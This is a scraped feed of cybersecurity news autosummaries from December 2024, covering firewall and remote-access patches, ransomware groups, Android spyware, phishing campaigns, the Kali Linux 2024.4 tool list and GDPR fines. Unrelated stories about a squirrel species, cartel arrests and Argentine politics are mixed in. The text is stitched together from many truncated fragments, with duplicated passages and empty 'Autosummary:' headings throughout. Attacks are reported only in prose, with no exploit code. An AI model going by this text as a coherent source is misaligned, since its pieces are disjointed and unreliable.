It has been remediated in the following versions - CVE-2024-12727 - v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v20 MR2, v20 MR3, v19.5 MR3, v19.5 MR4, v19.0 MR2) - v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v20 MR2, v20 MR3, v19.5 MR3, v19.5 MR4, v19.0 MR2) CVE-2024-12728 - v20 MR3, v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v19.5 GA, v19.5 MR1, v19.5 MR2, v19.5 MR3, v19.5 MR4, v19.0 MR2, v20 MR2) - v20 MR3, v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v19.5 GA, v19.5 MR1, v19.5 MR2, v19.5 MR3, v19.5 MR4, v19.0 MR2, v20 MR2) CVE-2024-12729 - v21 MR1 and newer (Hotfixes for v21 GA, v20 GA, v20 MR1, v20 MR2, v19.5 GA, v19.5 MR1, v19.5 MR2, v19.5 MR3, v19.5 MR4, v19.0 MR2, v19.0 MR3) To ensure that the hotfixes have been applied, users are being recommended to follow the below-mentioned steps - CVE-2024-12727 - Launch Device Management > Advanced Shell from the Sophos Firewall console, and run the command "cat /conf/nest_hotfix_status" (The hotfix is applied if the value is 320 or above) - Launch Device Management > Advanced Shell from the Sophos Firewall console, and run the command "cat /conf/nest_hotfix_status" "Autosummary:
"Autosummary:
A new species of dwarf squirrel will also belong to a new genus, giving it a higher level of distinction This dwarf squirrel measures just 14cm (5.5in), half the length of an average grey squirrel in the UK, which ranges from 24 to 29cm, according to the UK Squirrel Accord. "Autosummary:
"As alleged in the superseding complaint, at the time of Panev"s arrest in Israel in August, law enforcement discovered on Panev"s computer administrator credentials for an online repository that was hosted on the dark web and stored source code for multiple versions of the LockBit builder, which allowed LockBit"s affiliates to generate custom builds of the LockBit ransomware malware for particular victims," reads the complaint. "Autosummary:
Krispy Kreme entry on Play Ransomware leak site (BleepingComputer) Play ransomware claims, without proof, that they collected and stole files containing "private and personal confidential data, client documents, budget, payroll, accounting, contracts, taxes, IDs, finance information," and more. "Autosummary:
For example, if you visit a fake Microsoft tech support page claiming your computer is infected and urging you to call a number, Chrome’s AI could analyze the language, detect the scam tactics like fake urgency or suspicious domains, and display a warning alerting you to avoid interacting with the page or sharing personal information. "Autosummary:
Chrome"s AI-powered scam detection feature Source: BleepingComputer This feature is believed to help the scam detection service detect the brand and purpose (intent) of a webpage, making it easier to identify potential scams. "In 2024, ransomware remained the top cybersecurity threat to organizations worldwide. New groups filled the void left by law enforcement crackdowns, targeting businesses with record-breaking ransom demands and sophisticated tactics. In this article, you will find excerpts from ransomware surveys we covered in 2024 that will help your organization improve cybersecurity strategies. VPN vulnerabilities, weak credentials fuel ransomware attacks Following law enforcement’s takedown of LockBit in Q1, RansomHub, which emerged in February 2024, quickly filled the void, … More
The post Ransomware in 2024: New players, bigger payouts, and smarter tactics appeared first on Help Net Security.
"Autosummary:
During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%. The findings from the report uncovered a record-breaking ransom payment of $75 million to the Dark Angels ransomware group, which is nearly double the highest publicly known ransomware payout, and an overall 18% increase in ransomware attacks year-over-year.As for whether organizations are paying the ransom, respondents were split: 34% pay every time, 21% pay only some of the time, and 45% never pay. "In this Help Net Security interview, Dan Lohrmann, CISO at Presidio, discusses the need for organizations to rethink their leadership and operational strategies and the cybersecurity risks they have to deal with during digital transformation.
The post Leadership skills for managing cybersecurity during digital transformation appeared first on Help Net Security.
"Autosummary:
Ensure that repeatable cybersecurity processes are implemented, including updates to areas such as access controls, incident response plans, backup and recovery, vulnerability management, end-to-end change management and other aspects of operational security.In this Help Net Security interview, Dan Lohrmann, CISO at Presidio, discusses the need for organizations to rethink their leadership and operational strategies and the cybersecurity risks they have to deal with during digital transformation.This positive change can lead to greater empowerment, as employees gain access to real-time data, (AI tools, and automated systems that help them make decisions and improve their productivity). "Autosummary:
Active since 2021, Storm-0940 gains access through password spraying, brute-force attacks, and exploiting network edge services, targeting sectors like government, law, defense, and NGOs in North America and Europe.The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and previously unknown vulnerabilities. "Autosummary:
FortiManager versions 6.4.10 through 6.4.14 (Fixed in 6.4.15 or above) Fortinet also noted that a number of older models, 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, and 3900E, are affected by CVE-2024-48889 provided the "fmg-status" is enabled. "Autosummary:
"Autosummary:
Spyware app on the Amazon Appstore Source: McAfee Opening the malicious app welcomes the user to a simple interface that provides the promised functionality, such as calculating their BMI. "Autosummary:
According to the security bulletin Fortinet published yesterday, on December 18, 2024, CVE-2023-34990 was fixed in FortiWLM versions 8.6.6 and 8.5.5, released at the end of September 2023. "Autosummary:
The BadBox malware botnet BadBox is an Android malware thought to be based on the "Triada" malware family, infecting devices made by obscure manufacturers either through supply chain attacks on their firmware, shady employees, or through injections taking place as they enter the product distribution phase. "Breaches in 2024 had less impact on consumers’ trust in brands compared to the previous year (a 6.5% decrease from 62% in 2023 to 58% in 2024), according to a recent Vercara report. Most consumers also remain unaware of the role they may play in cyber incidents. Consumers don’t trust companies hit by data breaches The research reveals that consumers are unaware of the impact of insider threats, and instead assume bad actors are to … More
The post Consumers wrongly attribute all data breaches to cybercriminals appeared first on Help Net Security.
"Autosummary:
Survey respondents believe that the top four causes of breaches are: Bad actors hacking into a company’s system – 36% (with 67% of Generation Z holding this belief) A company having extremely poor security measures – 33% Bad actors breaking into physical offices – 8% Insider threats – 5% While insider threats ranked last on this list, in reality, human error is the cause of most sensitive data loss. "Autosummary:
The fines are pursuant to the violation of four different clauses under the GDPR data privacy laws, namely Article 33(3), Article 33(5), Article 25(1), and Article 25(2) - Failing to include in its breach notification all the information that it could and should have included Failing to document the facts relating to each breach, the steps taken to remedy them, and to do so in a way that allows the Supervisory Authority to verify compliance Failing to ensure that data protection principles were protected in the design of processing systems Failing in its obligations as a controller to ensure that only personal data that are necessary for specific purposes are processed "This enforcement action highlights how the failure to build in data protection requirements throughout the design and development cycle can expose individuals to very serious risks and harms, including a risk to the fundamental rights and freedoms of individuals," DPC Deputy Commissioner Graham Doyle said. "Autosummary:
"A threat actor looking to take over the Microsoft Azure cloud infrastructure of European companies has successfully compromised accounts of multiple victims in different firms, according to Palo Alto Networks’ Unit 42 researchers. The phishing campaign The attack started earlier this year, with phishing emails that were received by roughly 20,000 users in European (including German and UK) companies in the automotive, chemical and industrial compound manufacturing sectors. The campaign peaked in June 2024. The … More
The post European companies hit with effective DocuSign-themed phishing emails appeared first on Help Net Security.
"Autosummary:
"BeyondTrust has fixed an unauthenticated command injection vulnerability (CVE-2024-12356) in its Privileged Remote Access (PRA) and Remote Support (RS) products that may allow remote code execution, and is urging organizations with on-premise installations to test the patch and implement it quickly. About CVE-2024-12356 BeyondTrust Privileged Remote Access is an enterprise solution that mediates secure remote access to enterprise environments for employees and trusted vendors. BeyondTrust Remote Support allows organizations’ IT helpdesk personnel to securely connect … More
The post BeyondTrust fixes critical vulnerability in remote access, support solutions (CVE-2024-12356) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
A new ActiveState: tackling open source security challenges head-on Through our work in open source over the past decade, we"ve discovered there"s a gap between the passionate communities producing open source and the enterprises that want to use it in their software. Reimagining the open source management process At ActiveState, it"s our mission to bring rigor to the open source supply chain. Over time, our focus shifted from helping companies run open source to supporting enterprises managing open source when the community wasn"t producing it in the way they needed it. The current state of open source and supply chain security It"s inevitable that with the soaring popularity of open source comes an influx of security issues. "Autosummary:
"Autosummary:
Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches. The hackers did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said. "Autosummary:
In social media groups that specialize in pallet liquidation, you’ll find advertisements that promise valuable merchandise at significantly discounted prices, such as electronics, tools, or other high-demand items. Groups that engage in pallet liquidation sales are rampant on social media and it’s hard to discern the scammers from the legitimate ones (to be honest, I’ve always thought they were all scams, until someone told me there are legitimate ones), let alone the grey area in between. Depending on the reason of sale and the origin, the pallets may include a large quantity of one product or a mix of products, such as overstock or discontinued items, customer returns, or refurbished goods. "Autosummary:
Phishing attacks are also increasingly finding novel ways to bypass email security measures, the latest among them being the abuse of legitimate services like Google Calendar and Google Drawings, as well as spoofing email security provider brands, such as Proofpoint, Barracuda Networks, Mimecast, and Virtru. "Autosummary:
"Autosummary:
Mr Gertz added that Mexico has called for his extradition "on countless occasions", but was rebuffed because US authorities considered López Serrano a "protected witness" who "was giving them a lot of information". "Autosummary:
"Autosummary:
However, the phishing emails associated with this campaign failed Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC) checks. "Autosummary:
" Signal nominated as secure messaging alternative In today"s advisory, CISA recommends switching to an end-to-end encrypted messaging application, naming Signal as an alternative for mobile communication across multiple mobile (iOS, Android) and desktop (macOS, Windows, and Linux) platforms. "Autosummary:
"Autosummary:
"Autosummary:
The domain names registered for the campaign suggest that APT29 targeted entities primarily in the U.S., France, Australia, Ukraine, Portugal, Germany, Israel, France, Greece, Turkey, and the Netherlands. "Autosummary:
" In November 2022, the FCC also banned sales of communications equipment made by five other Chinese companies (i.e., Huawei Technologies, ZTE Corporation, Hytera Communications, Hangzhou Hikvision Digital Technology, and Dahua Technology) due to "unacceptable risks to national security. "Autosummary:
"CISO ONE Security | Israel | Hybrid – View job details As a CISO, you will be responsible for overseeing information security, cybersecurity, application security, and business continuity strategies. The role involves implementing and managing security measures and collaborating with internal teams to ensure data protection and compliance. Cloud Security Engineer KUBRA | Canada | Hybrid – View job details As a Cloud Security Engineer, you will perform security assessments of KUBRA systems, applications, and … More
The post Cybersecurity jobs available right now: December 17, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Security Engineer, Offensive Security VXI Global Solutions | USA | Hybrid – View job details As a Senior Security Engineer, Offensive Security, you will independently manage complete red team exercises,research emerging attack vectors, vulnerabilities and techniques, develop custom payloads and exploits. Manager | Cyber | Cyber Defense & Resilience Deloitte | UAE | On-site – View job details As a Manager | Cyber | Cyber Defense & Resilience, you will conduct security assessments, threat modelling, and risk analysis to identify potential security gaps and recommend solutions. Senior Security Architect – Compliance Team TELUS | Canada | On-site – View job details As a Senior Security Architect – Compliance Team, you will help identify, implement, maintain and update critical security controls to strengthen overall security posture for RFP programs. "Autosummary:
"Careto is capable of inventing extraordinary infection techniques, such as persistence through the MDaemon email server or implant loading though the HitmanPro Alert driver, as well as developing complex multi-component malware," Kaspersky said. "Autosummary:
"The operation exploited a suspected zero-day vulnerability, enabling attackers to infiltrate networks, steal credentials, and deploy ransomware," the company said, adding the campaign "involved three distinct threat actors – Monstrous Mantis (Ragnar Locker), Ruthless Mantis (PTI-288) and LARVA-15 (Wazawaka) – who followed a structured and efficient workflow. "Kali Linux 2024.4 includes a broad set of updates and changes. The summary of the changelog since the 2024.3 release from September: Python 3.12 – New default Python version (Au revoir pip, hello pipx). The end of the i386 kernel and images – Farewell x86 (images), but not goodbye (packages). Deprecations in the SSH client: DSA keys – Reminder about using ssh1 if required. Raspberry Pi Imager customizations support: Able to alter settings at write … More
The post Kali Linux 2024.4 released! 14 new shiny tools added appeared first on Help Net Security.
"Autosummary:
Generate username lists for companies on LinkedIn – Generate username lists for companies on LinkedIn mssqlpwner – Interact and pwn MSSQL servers – Interact and pwn MSSQL servers openssh-ssh1 – SSH client for legacy SSH1 protocol – SSH client for legacy SSH1 protocol proximoth – Control frame attack vulnerability detection tool – Control frame attack vulnerability detection tool python-pipx – Execute binaries from Python packages in isolated environments – Execute binaries from Python packages in isolated environments sara – RouterOS Security Inspector – RouterOS Security Inspector web-cache-vulnerability-scanner – Go-based CLI tool for testing for web cache poisoning – Go-based CLI tool for testing for web cache poisoning xsrfprobe – Advanced CSRF/XSRF audit and exploitation toolkit. New Tools in Kali bloodyad – Active Directory privilege escalation framework – Active Directory privilege escalation framework certi – Ask for certificates to ADCS and discover templates – Ask for certificates to ADCS and discover templates chainsaw – Search and hunt through Windows forensic artefacts – Search and hunt through Windows forensic artefacts findomain – Complete solution for domain recognition – Complete solution for domain recognition linkedin2username – "Autosummary:
Both WmRAT and MiyaRAT, as previously detailed by QiAnXin, come with standard remote access trojan (RAT) capabilities, allowing the malware to collect host information, upload or download files, take screenshots, get geolocation data, enumerate files and directories, and run arbitrary commands via cmd.exe or PowerShell. "Autosummary:
CoinLurker, once launched, initiates communications with a remote server using a socket-based approach and proceeds to harvest data from specific directories associated with cryptocurrency wallets (namely, Bitcoin, Ethereum, Ledger Live, and Exodus), Telegram, Discord, and FileZilla. "Autosummary:
"Autosummary:
Specifically, the Irish DPC says the following GDPR violations are related to the incident: Article 33(3) : Incomplete breach notification details → €8M fine : Incomplete breach notification details → €8M fine Article 33(5) : Poor documentation of breach facts/remedies → €3M fine : Poor documentation of breach facts/remedies → €3M fine Article 25(1) : "Malware that’s made specifically to target industrial control systems (ICS), Internet of Things (IoT) and operational technology (OT) control devices is still rare, but in the last few weeks security researchers have identified two salient threats based on samples uploaded to VirusTotal: Claroty’s Team82 researchers have unearthed IOCONTROL, a piece of malware that appears to be generic enough to run on a variety of platforms and devices from different vendors. Forescout’s Vedere Labs researchers have … More
The post Researchers reveal OT-specific malware in use and in development appeared first on Help Net Security.
"Autosummary:
The malware can apparently run on routers, programmable logic controllers (PLCs), human-machine interfaces (HMIs), firewalls, and other Linux-based IoT/OT platforms, manufactured by Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, Unitronics, and other vendors. "Autosummary:
Los Zetas cartel boss re-arrested in Mexico after US jail time Osiel Cárdenas Guillén was quickly re-arrested on his return to Mexico US immigration officials handed Cárdenas over to Mexican police at the Otay border crossing, where he was quickly re-arrested and taken to El Altiplano maximum security jail in Mexico state. "Autosummary:
Apache publicly disclosed the Struts CVE-2024-53677 flaw (CVSS 4.0 score: 9.5, "critical") six days ago, stating it is a bug in the software"s file upload logic, allowing path traversals and the uploading of malicious files that could lead to remote code execution. "Autosummary:
" "By monitoring key metrics like domain registrations, textual patterns, DNS anomalies and change request trends, security teams can identify and mitigate threats early." "Autosummary:
Both malware are C++ remote access trojans (RATs) that provide Bitter with data exfiltration, remote control, screenshot capturing, command execution (CMD or PowerShell), and system monitoring capabilities. "Autosummary:
" Phishing email about a fake Ledger data breach Source: BleepingComputer Clicking the "Verify My Recovery Phrase" button brings you to an Amazon AWS website at "https://product-ledg.s3.us-west-1.amazonaws[.]com/recover.html" that then redirects users to a phishing page at "ledger-recovery[.]info". Fake Ledger site Source: BleepingComputer Clicking the "Verify your Ledger now" brings up another page asking you to enter your 12, 18, or 24-word Ledger recovery phrase. "Autosummary:
"Autosummary:
We can see what their website looked like in 2021, using the Internet Archive: Sometimes more recently, this same website was taken over by criminals who transformed it into a phishing page for Kaiser Permanente: Malicious redirect to SocGholish It looks like there was more than one cook in the kitchen, as malicious code was also injected in the core JavaScript libraries for that website, confirmed in a scan by Sucuri’s SiteCheck: When potential victims clicked on the ad, they landed on that compromised website, which in turn briefly displayed the phishing template only for as long as a mouse scroll or click.Then, a new screen appeared with what looks like a Google Chrome notification claiming the user’s browser is out of date: This screen, also known as SocGholish, is a long running malware campaign that targets vulnerable websites indiscriminately. "The clock is ticking for financial institutions across the EU as the January 17, 2025, deadline for the Digital Operational Resilience Act (DORA) approaches. This regulation will reshape how organizations in the financial sector approach cybersecurity and operational resilience. It demands more than just technical upgrades — it calls for a strategic shift in mindset and practices.
The post With DORA approaching, financial institutions must strengthen their cyber resilience appeared first on Help Net Security.
"Autosummary:
To meet DORA’s standards, organizations must strengthen their operations across five critical areas: ICT risk management, incident reporting, resilience testing, third-party risk management, and information sharing. For DORA compliance, institutions must ensure their testing is comprehensive, encompassing internal systems, third-party integrations and the latest threat intelligence. "Platform security – securing the hardware and firmware of PCs, laptops and printers – is often overlooked, weakening cybersecurity posture for years to come, according to HP. The report, based on a global study of 800+ IT and security decision-makers (ITSDMs) and 6000+ work-from-anywhere (WFA) employees, shows that platform security is a growing concern with 81% of ITSDMs agreeing that hardware and firmware security must become a priority to ensure attackers cannot exploit vulnerable devices. … More
The post Overlooking platform security weakens long-term cybersecurity posture appeared first on Help Net Security.
"Autosummary:
The prioritization, or lack thereof, of hardware and firmware security requirements during procurement can have ramifications across the entire lifetime of a fleet of devices – from increased risk exposure, to driving up costs or negative user experience – if security and manageability requirements are set too low compared to the available state of the art,” warns Boris Balacheff, Chief Technologist for Security Research and Innovation at HP Inc. “It’s essential that end-user device infrastructures become resilient to cyber risks. The report, based on a global study of 800+ IT and security decision-makers (ITSDMs) and 6000+ work-from-anywhere (WFA) employees, shows that platform security is a growing concern with 81% of ITSDMs agreeing that hardware and firmware security must become a priority to ensure attackers cannot exploit vulnerable devices. Five stages of the device lifecycle Supplier selection – In addition, 34% say a PC, laptop or printer supplier has failed a cybersecurity audit in the last five years, with 18% saying the failure was so serious that they terminated their contract. "Autosummary:
Similar to major scam operations like Telekopye, it"s suspected that there are different groups who are in charge of managing each and every aspect of the attack chain: Theft, creation, and abuse of Meta accounts and ads, building the phishing infrastructure, and running the call centers. "Autosummary:
The primary module that enables the attack is "task_loader," which is used to assess the execution environment and fetch additional components, including "init_task," which is responsible for downloading an ELF-based backdoor that masquerades as the FastCGI Process Manager ("/lib/php-fpm"), infecting PHP files with malicious code for further payload execution, and collecting sensitive information and modifying system files. "Autosummary:
"Autosummary:
" Subsequently, the researchers provided Google"s Threat Analysis Group (TAG) with exploit artifacts, leading to uncovering the flaws in Qualcomm"s DSP (Digital Signal Processor) driver ("adsprpc"), which is used for offloading multimedia processing to the DSP core. "In February 2024, Slaviša Milanov, an independent journalist from Dimitrovgrad in Serbia who covers local interest news stories, was brought into a police station after a seemingly routine traffic stop," reads a report by Amnesty International. "Autosummary:
The list includes — CVE-2024-11639 (Ivanti CSA), CVE-2024-49138 (Windows CLFS Driver), CVE-2024-44131 (Apple macOS), CVE-2024-54143 (OpenWrt), CVE-2024-11972 (Hunk Companion plugin), CVE-2024-11205 (WPForms), CVE-2024-12254 (Python), CVE-2024-53677 (Apache Struts), CVE-2024-23474 (SolarWinds Access Rights Manager), CVE-2024-43153, CVE-2024-43234 (Woffice theme), CVE-2024-43222 (Sweet Date theme), JS Help Desk (JS Help Desk plugin), CVE-2024-54292 (Appsplate plugin), CVE-2024-47578 (Adobe Document Service), CVE-2024-54032 (Adobe Connect), CVE-2024-53552 (CrushFTP), CVE-2024-55884 (Mullvad VPN), and CVE-2024-28025, CVE-2024-28026, CVE-2024-28027, CVE-2024-21786 (MC Technologies MC-LR Router), CVE-2024-21855, CVE-2024-28892, and CVE-2024-29224 (GoCast).IOCONTROL has been used to attack IoT and SCADA devices of various types including IP cameras, routers, PLCs, HMIs, firewalls, and more from different vendors such as Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics.IOCONTROL has been used to attack IoT and SCADA devices of various types including IP cameras, routers, PLCs, HMIs, firewalls, and more from different vendors such as Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics. — Academic researchers from KU Leuven, the University of Lübeck, and the University of Birmingham have devised a new technique called (CVE-2024-21944, CVSS score: 5.3) that employs $10 off-the-shelf equipment combining Raspberry Pi Pico, a DDR Socket, and a 9V source to breach AMD"s Secure Encrypted Virtualization (SEV) guarantees.BadRAM Relies on $10 Equipment to Break AMD Security — Academic researchers from KU Leuven, the University of Lübeck, and the University of Birmingham have devised a new technique called BadRAM (CVE-2024-21944, CVSS score: 5.3) that employs $10 off-the-shelf equipment combining Raspberry Pi Pico, a DDR Socket, and a 9V source to breach AMD"s Secure Encrypted Virtualization (SEV) guarantees."These attacks are characterized by a sudden and significant increase in authentication attempts and failures, which trigger alerts across monitoring systems, including Gateway Insights and Active Directory logs," the company said, adding they could result in excessive logging, management CPU overload, and appliance instability."These attacks are characterized by a sudden and significant increase in authentication attempts and failures, which trigger alerts across monitoring systems, including Gateway Insights and Active Directory logs," the company said, adding they could result in excessive logging, management CPU overload, and appliance instability."BadRAM completely undermines trust in AMD"s latest Secure Encrypted Virtualization (SEV-SNP) technology, which is widely deployed by major cloud providers, including Amazon AWS, Google Cloud, and Microsoft Azure," security researcher Jo Van Bulck told The Hacker News. "Autosummary:
Tracked as CVE-2024-35250, this security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don"t require user interaction. "Autosummary:
"On December 13, 2024, the State was informed by its vendor, Deloitte, that there was a major security threat to the RIBridges system," reads the announcement published by the Rhode Island authorities on Saturday. "Autosummary:
In these scams, online criminals prey on people looking for remote jobs by offering them simple repetitive tasks such as liking videos, optimizing apps, boosting product interest, or rating product images. "Serbian police and intelligence officers used Cellebrite forensic extraction software to unlock journalists’ and activists’ phones and install previously unknown Android spyware called NoviSpy, a new Amnesty International report claims. The unlocking was made possible through exploitation of a zero-day vulnerability affecting chipsets made by Qualcomm. In early October 2024, Qualcomm fixed CVE-2024-43047, reported by Google’s Threat Analysis Group (TAG) and Amnesty International as exploited in the wild. Google followed with a fix for Android … More
The post Serbian government used Cellebrite to unlock phones, install spyware appeared first on Help Net Security.
"Autosummary:
The spyware communicates with servers hosted in Serbia, some on an IP address range associated with the BIA, and configuration data embedded in one spyware sample “ties back to a specific BIA employee, who was previously linked to Serbia’s efforts to procure Android spyware from the now defunct spyware vendor, Hacking Team.” "Autosummary:
"Autosummary:
"Autosummary:
The fourteen new tools released in this release are: bloodyad - Active Directory privilege escalation framework (Submitted by @Arszilla) certi - Ask for certificates to ADCS and discover templates (Submitted by @Arszilla) chainsaw - Rapidly search and hunt through Windows forensic artefacts (Submitted by @Arszilla) findomain - Fastest and most complete solution for domain recognition (Submitted by @Arszilla) hexwalk - Hex analyzer, editor and viewer linkedin2username - Generate username lists for companies on LinkedIn mssqlpwner - Interact and pwn MSSQL servers openssh-ssh1 - Secure SHell (SSH) client for legacy SSH1 protocol proximoth - Control frame attack vulnerability detection tool (Submitted by @TechnicalUserX) python-pipx - Execute binaries from Python packages in isolated environments sara - RouterOS Security Inspector (Submitted by @casterbyte) web-cache-vulnerability-scanner - Go-based CLI tool for testing for web cache poisoning (Submitted by @Arszilla) xsrfprobe - An advanced Cross Site Request Forgery (CSRF/XSRF) audit and exploitation toolkit. New Kali Linux 2024.4 login theme Source: Kali How to get Kali Linux 2024.4 To start using Kali Linux 2024.4, you can upgrade your existing installation, select a platform, or directly download ISO images for new installs and live distributions. Once done upgrading, you can check if the upgrade was successful by using the following command: grep VERSION /etc/os-release Checking the version of Kali Linux Source: BleepingComputer You can view the complete changelog for Kali 2024.4 on Kali"s website. "Autosummary:
"Autosummary:
If the data is government services, institutions, medicine, then we will immediately delete this data without hesitation (let me remind you about the last time when it was with moveit - all government data, medicine, clinics, data of scientific research at the state level were deleted), we comply with our regulations. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes exploited zero-day (CVE-2024-49138) On December 2024 Patch Tuesday, Microsoft resolved 71 vulnerabilities in a variety of its products, including a zero-day (CVE-2024-49138) that’s been exploited by attackers in the wild to execute code with higher privileges. Top cybersecurity books for your holiday gift list The holiday season is approaching, and with it, the tradition of gift-giving. For professionals … More
The post Week in review: Microsoft fixes exploited 0-day, top cybersecurity books for your holiday gift list appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: December 13, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Cato Networks, Horizon3.ai, SecureAuth, Stamus Networks, Trellix, and Versa Networks. Strengthening security posture with comprehensive cybersecurity assessments In this Help Net Security interview, Phani Dasari, CISO at HGS, discusses key aspects of cybersecurity assessments, including effective tools and methodologies, the role of AI and automation, and strategies for aligning assessments with organizational needs. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
U.S. CISA adds Cleo Harmony, VLTrader, and LexiCom flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini December 14, 2024 December 14, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cleo Harmony, VLTrader, and LexiCom flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
This may include smartphones and tablets, smart speakers, security cameras, smart TVs, streaming boxes, and various internet-connected appliances that follow an obscure route from manufacturing to resell networks. "Autosummary:
These scams impersonate legitimate companies, such as Deloitte, Amazon, McKinsey and Company, and Airbnb, and the victims are given tasks in sets, usually of forty items. "Autosummary:
Impersonating the Samsung Knox Manager Source: BleepingComputer Lookout says development work on BoneSpy peaked between January and October 2022, stabilizing to the following capabilities: Collects SMS messages, including sender, content, and timestamps Records ambient audio and phone call conversations Captures GPS and cell-based location data Takes pictures using the camera and captures device screenshots Accesses user"s web browsing history Extracts names, numbers, emails, and call details from the contact list and call logs Accesses clipboard content Reads device notifications PlainGnome is a newer, custom Android surveillance malware that does not use the codebase of a previously known project. "Autosummary:
This may include smartphones and tablets, smart speakers, security cameras, smart TVs, streaming boxes, and various internet-connected appliances that follow an obscure route from manufacturing to resell networks. "Autosummary:
But in an interesting twist, the second-stage malware is through four different ways - Backdoored configure compilation file Malicious payload embedded in a PDF file Using a Python dropper Inclusion of a malicious npm package "0xengine/meow" "MUT-1244 was able to compromise the system of dozens of victims, mostly red teamers, security researchers, and anyone with an interest in downloading PoC exploit code," the researchers said. "Autosummary:
"Autosummary:
The development makes IOCONTROL the tenth malware family to specifically single out Industrial Control Systems (ICS) after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, PIPEDREAM (aka INCONTROLLER), COSMICENERGY, and FrostyGoop (aka BUSTLEBERM) to date. "Autosummary:
"Autosummary:
While the cybersecurity agency didn"t provide any other information regarding the ransomware campaign targeting Cleo servers left vulnerable to CVE-2024-50623 exploits, these attacks are uncannily similar to previous Clop data theft attacks that exploited zero-days in MOVEit Transfer, GoAnywhere MFT, and Accellion FTA in recent years. "Autosummary:
Impersonating the Samsung Knox Manager Source: BleepingComputer Lookout says development work on BoneSpy peaked between January and October 2022, stabilizing to the following capabilities: Collects SMS messages, including sender, content, and timestamps Records ambient audio and phone call conversations Captures GPS and cell-based location data Takes pictures using the camera and captures device screenshots Accesses user"s web browsing history Extracts names, numbers, emails, and call details from the contact list and call logs Accesses clipboard content Reads device notifications PlainGnome is a newer, custom Android surveillance malware that does not use the codebase of a previously known project. "Autosummary:
The exact mechanism by which the malware-laced apps are distributed remains unclear, but it’s suspected to involve targeted social engineering, masquerading themselves as battery charge monitoring apps, photo gallery apps, a fake Samsung Knox app, and a fully functional-but-trojanized Telegram app. The two malware families can collect data such as SMS messages, call logs, phone call audio, photos from device cameras, device location, and contact lists. "Autosummary:
" Reuters Plans to privatise Aerolineas Argentinas are part of Milei"s cost-cutting drive Marcelo J García, Buenos Aires-based director for the Americas at global consulting firm Horizon Engage, says Milei"s decision to wield a chainsaw on the campaign trail as a sign of his approach to government was a "masterpiece" of political marketing that has "captured the imagination of small-state activists across the globe". Meanwhile, tech billionaire Elon Musk, who looks set to play a key role in the incoming US administration, has also praised Milei, saying Argentina is "experiencing a giant improvement" under his leadership. "Autosummary:
"Bolivians are handed over to the North American Empire, violating international agreements, without first being tried in their homeland where they supposedly committed crimes", he added. "Autosummary:
"This flaw poses a significant security risk, as it enables attackers to install vulnerable or closed plugins, which can then be exploited for attacks such as Remote Code Execution (RCE), SQL Injection, Cross‑Site Scripting (XSS), or even the creation of administrative backdoors," WPScan said in a report. "Popular US doughnut chain Krispy Kreme has been having trouble with its online ordering system as well as digital payments at their brick-and-mortar shops since late November, and now we finally know why: an 8-K report filed with the US Securities and Exchange Commission (SEC) has revealed that the company has suffered a “cybersecurity incident”. The company was notified about unauthorized activity on a portion of its information technology systems on November 29, 2024, and … More
The post Krispy Kreme cybersecurity incident disrupts online ordering appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Gamaredon, also called Aqua Blizzard, Armageddon, BlueAlpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder, is a hacking group affiliated with Russia"s Federal Security Service (FSB). "Autosummary:
The flaw, tracked as CVE-2024-44131 (CVSS score: 5.3), resides in the FileProvider component, per Apple, and has been addressed with improved validation of symbolic links (symlinks) in iOS 18, iPadOS 18, and macOS Sequoia 15. "Autosummary:
"Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.24) to address additional discovered potential attack vectors of the vulnerability," the company said. "Autosummary:
"Autosummary:
The notice underlines that no user funds or digital assets were compromised from this breach, but the attackers accessed the following sensitive information: Full name Date of birth Physical address Phone number Email address Government-issued ID Social Security number (SSN) Transaction activity User photographs The above information is particularly sensitive and very revealing for cryptocurrency holders, potentially putting them at risk of SIM swap attacks, account takeovers, or other targeted phishing attacks. "Cleo has released a security patch to address the critical vulnerability that started getting exploited while still a zero-day to breach internet-facing Cleo Harmony, VLTrader, and LexiCom instances. Version 5.8.0.24 of the three products, which was pushed out on Wednesday, plugs the hole that allowed attackers into vulnerable installations, where they moved to establish a reverse shell connection to their servers and perform reconnaissance. Huntress researcher John Hammond confirmed that the patch is effective at … More
The post Cleo patches zero-day exploited by ransomware gang appeared first on Help Net Security.
"Autosummary:
